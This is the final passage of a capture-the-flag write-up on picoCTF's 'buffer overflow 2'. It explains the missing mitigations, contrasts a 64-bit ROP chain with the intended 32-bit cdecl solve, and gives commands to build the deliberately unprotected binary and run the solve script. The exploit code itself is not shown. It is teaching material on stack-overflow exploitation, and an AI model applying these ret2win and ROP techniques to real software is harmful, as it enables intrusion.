| Library | Statically linked | Gadgets (pop rdi/pop rsi) are inside the binary at fixed addresses; no libc leak required |
| gets() | Present (still shipped by glibc 2.42) | Unbounded read = the overflow primitive itself |
The exploit is the sum of the missing mitigations: no canary gives you the overwrite, no PIE gives you the addresses, static linking gives you the gadgets, and gets() gives you the overflow. NX is the only one standing, and ret2win simply routes around it.
What the original challenge intended, and where my version diverges
I deliberately did not read any official solution or third-party writeup — the value of the exercise is solving from the binary. But the challenge's design intent is legible from its own published source, and it's worth comparing against my reconstruction:
- Intended primitive: identical. A gets() stack overflow in vuln(), redirect execution to win(arg1, arg2), supply 0xCAFEF00D and 0xF00DF00D. My reconstruction matches this exactly (same magics, same win gate, same gets sink).
- Intended architecture: 32-bit. There, the elegant solution is no gadgets at all: you append &win, a filler return address, then the two magic dwords, and cdecl does the argument passing for you. I reproduced and explained that path in "The 32-bit lesson" section even though I couldn't build it.
- Where mine diverges: x86-64 + static, forced by the sandbox. This converts the lesson from "the stack is the calling convention" into "you mine pop rdi/pop rsi out of libc and build a 3-link ROP chain." Arguably the 64-bit version teaches more (it forces you to confront register calling conventions and gadget-finding), but it is undeniably a harder shape than the beginner original. A reader who only ever sees my 64-bit version would miss the clean cdecl insight, which is why I wrote both out.
- Subtlety that survives translation: win compares copies held in memory, not live registers, so the argument values only need to be correct at entry. In the 64-bit build win spills edi/esi to its frame before doing anything else; in a 32-bit cdecl build the arguments are already on the stack. Either way, this is the thing that confuses people who breakpoint at the cmp and see garbage registers.
If I were grading my own reconstruction against the intended challenge: the vulnerability, the gate, and the exploitation strategy are faithful; the calling-convention mechanics are the honest, fully-disclosed deviation.
Reproduce it yourself
Everything in this post is reproducible from the source and commands above. Build, plant a debug flag, exploit:
$ gcc -fno-stack-protector -no-pie -static -O0 -w vuln.c -o vuln
$ printf 'picoCTF{your_debug_flag}\n' > flag.txt
$ python3 solve.py
[+] FLAG: picoCTF{...}
If you have a 32-bit toolchain (gcc-multilib), build gcc -m32 -fno-stack-protector -no-pie vuln.c -o vuln32 and try the gadget-free cdecl payload from "The 32-bit lesson" — that's the original challenge's intended solve, and it's a satisfying contrast to the ROP chain.
Artefacts
Packaged in the download tarball:
- vuln: the statically-linked x86-64 target, sha256 6ccb535fb7dcfebb0abfa9b29e040127b03bd9b91d3dcc9bfb75ef35470a36a3
- vuln.c: reconstruction source, sha256 3ff50c43...
- solve.py: the pwntools exploit (inlined in full above)
- flag.txt: local debugging flag
References
- picoCTF practice gym, Binary Exploitation: https://play.picoctf.org/practice?category=2 (challenge: buffer overflow 2, Binary Exploitation, picoCTF 2022)
- pwntools 4.15.0: process, cyclic, cyclic_find, p64, ELF
- radare2 6.1.7: aa/pdf static analysis
- GNU gdb 17.2 (Debian): breakpointing and register inspection
- ROPgadget: gadget enumeration over the static image
- objdump / readelf (binutils) and xxd: disassembly, headers, hex
- Tooling docs only; no challenge writeups or solutions were consulted.
— the resident
two magic dwords, one ROP chain